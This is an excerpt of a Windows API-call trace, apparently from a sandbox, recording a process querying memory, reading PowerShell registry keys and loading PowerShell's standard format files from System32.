	[0408.361] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.361] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.361] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.363] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.742] VirtualQuery (in: lpAddress=0xcbf80, lpBuffer=0xcce40, dwLength=0x30 | out: lpBuffer=0xcce40*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.743] VirtualQuery (in: lpAddress=0xcbf80, lpBuffer=0xcce40, dwLength=0x30 | out: lpBuffer=0xcce40*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.743] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.758] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.214] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.215] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.216] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.224] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0409.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.224] CoTaskMemFree (pv=0x1edb50) 
	[0409.229] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.238] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.239] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.551] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.552] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.553] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.553] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.554] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.555] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.556] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd428 | out: phkResult=0xcd428*=0x328) returned 0x0
	[0409.556] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xcd43c, lpData=0x0, lpcbData=0xcd438*=0x0 | out: lpType=0xcd43c*=0x1, lpData=0x0, lpcbData=0xcd438*=0x74) returned 0x0
	[0409.556] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xcd3ac, lpData=0x0, lpcbData=0xcd3a8*=0x0 | out: lpType=0xcd3ac*=0x1, lpData=0x0, lpcbData=0xcd3a8*=0x74) returned 0x0
	[0409.556] CoTaskMemAlloc (cb=0x78) returned 0x192530
	[0409.556] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xcd37c, lpData=0x192530, lpcbData=0xcd378*=0x74 | out: lpType=0xcd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd378*=0x74) returned 0x0
	[0409.556] CoTaskMemFree (pv=0x192530) 
	[0409.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0409.556] SetErrorMode (uMode=0x1) returned 0x1
	[0409.557] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd300 | out: lpFileInformation=0xcd300*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0409.557] SetErrorMode (uMode=0x1) returned 0x1
	[0409.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.557] SetErrorMode (uMode=0x1) returned 0x1
	[0409.557] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd300 | out: lpFileInformation=0xcd300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0409.557] SetErrorMode (uMode=0x1) returned 0x1
	[0409.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0409.558] SetErrorMode (uMode=0x1) returned 0x1
	[0409.558] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd300 | out: lpFileInformation=0xcd300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0409.558] SetErrorMode (uMode=0x1) returned 0x1
	[0409.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.558] SetErrorMode (uMode=0x1) returned 0x1
	[0409.558] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd300 | out: lpFileInformation=0xcd300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0409.558] SetErrorMode (uMode=0x1) returned 0x1
	[0409.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.558] SetErrorMode (uMode=0x1) returned 0x1
	[0409.558] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd300 | out: lpFileInformation=0xcd300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0409.558] SetErrorMode (uMode=0x1) returned 0x1
	[0409.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0409.559] SetErrorMode (uMode=0x1) returned 0x1
	[0409.559] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd300 | out: lpFileInformation=0xcd300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0409.559] SetErrorMode (uMode=0x1) returned 0x1
	[0409.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0409.559] SetErrorMode (uMode=0x1) returned 0x1
	[0409.559] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd300 | out: lpFileInformation=0xcd300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0409.559] SetErrorMode (uMode=0x1) returned 0x1
	[0409.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0409.559] SetErrorMode (uMode=0x1) returned 0x1
	[0409.559] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd300 | out: lpFileInformation=0xcd300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0409.559] SetErrorMode (uMode=0x1) returned 0x1
	[0409.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0409.559] SetErrorMode (uMode=0x1) returned 0x1
	[0409.560] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd300 | out: lpFileInformation=0xcd300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0409.560] SetErrorMode (uMode=0x1) returned 0x1
	[0409.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0409.560] SetErrorMode (uMode=0x1) returned 0x1
	[0409.560] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd300 | out: lpFileInformation=0xcd300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0409.560] SetErrorMode (uMode=0x1) returned 0x1
	[0409.560] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0409.560] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.560] CoTaskMemFree (pv=0x1edb50) 
	[0409.564] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0409.564] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.564] CoTaskMemFree (pv=0x1edb50) 
	[0409.565] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0409.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.565] CoTaskMemFree (pv=0x1edb50) 
	[0409.566] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0409.566] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.566] CoTaskMemFree (pv=0x1edb50) 
	[0409.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.567] SetErrorMode (uMode=0x1) returned 0x1
	[0409.567] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0409.567] GetFileType (hFile=0x2fc) returned 0x1
	[0409.567] SetErrorMode (uMode=0x1) returned 0x1
	[0409.567] GetFileType (hFile=0x2fc) returned 0x1
	[0409.567] ReadFile (in: hFile=0x2fc, lpBuffer=0x33616f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x33616f0*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0409.568] ReadFile (in: hFile=0x2fc, lpBuffer=0x33616f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x33616f0*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0409.569] ReadFile (in: hFile=0x2fc, lpBuffer=0x33616f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x33616f0*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0409.569] ReadFile (in: hFile=0x2fc, lpBuffer=0x33616f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x33616f0*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0409.569] ReadFile (in: hFile=0x2fc, lpBuffer=0x33616f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x33616f0*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0409.569] ReadFile (in: hFile=0x2fc, lpBuffer=0x33616f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x33616f0*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0409.569] ReadFile (in: hFile=0x2fc, lpBuffer=0x33616f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x33616f0*, lpNumberOfBytesRead=0xccf98*=0x9e2, lpOverlapped=0x0) returned 1
	[0409.569] ReadFile (in: hFile=0x2fc, lpBuffer=0x3360c3a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x3360c3a*, lpNumberOfBytesRead=0xccf98*=0x0, lpOverlapped=0x0) returned 1
	[0409.569] ReadFile (in: hFile=0x2fc, lpBuffer=0x33616f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x33616f0*, lpNumberOfBytesRead=0xccf98*=0x0, lpOverlapped=0x0) returned 1
	[0409.570] CloseHandle (hObject=0x2fc) returned 1
	[0409.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.570] SetErrorMode (uMode=0x1) returned 0x1
	[0409.570] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf40 | out: lpFileInformation=0xccf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0409.570] SetErrorMode (uMode=0x1) returned 0x1
	[0409.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.570] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd028 | out: phkResult=0xcd028*=0x2fc) returned 0x0
	[0409.570] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfac, lpData=0x0, lpcbData=0xccfa8*=0x0 | out: lpType=0xccfac*=0x1, lpData=0x0, lpcbData=0xccfa8*=0x56) returned 0x0
	[0409.570] CoTaskMemAlloc (cb=0x5a) returned 0x1b7726e0
	[0409.570] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf7c, lpData=0x1b7726e0, lpcbData=0xccf78*=0x56 | out: lpType=0xccf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf78*=0x56) returned 0x0
	[0409.570] CoTaskMemFree (pv=0x1b7726e0) 
	[0409.570] RegCloseKey (hKey=0x2fc) returned 0x0
	[0409.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.578] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x68d4259e, Data2=0xd142, Data3=0x45a7, Data4=([0]=0x8a, [1]=0x2d, [2]=0xae, [3]=0x8a, [4]=0x7f, [5]=0x16, [6]=0xf7, [7]=0x1b))) returned 0x0
	[0409.589] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x942434b0, Data2=0x4053, Data3=0x4adf, Data4=([0]=0x97, [1]=0x9f, [2]=0xca, [3]=0xb, [4]=0x56, [5]=0xfd, [6]=0x79, [7]=0x3e))) returned 0x0
	[0409.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0409.591] SetErrorMode (uMode=0x1) returned 0x1
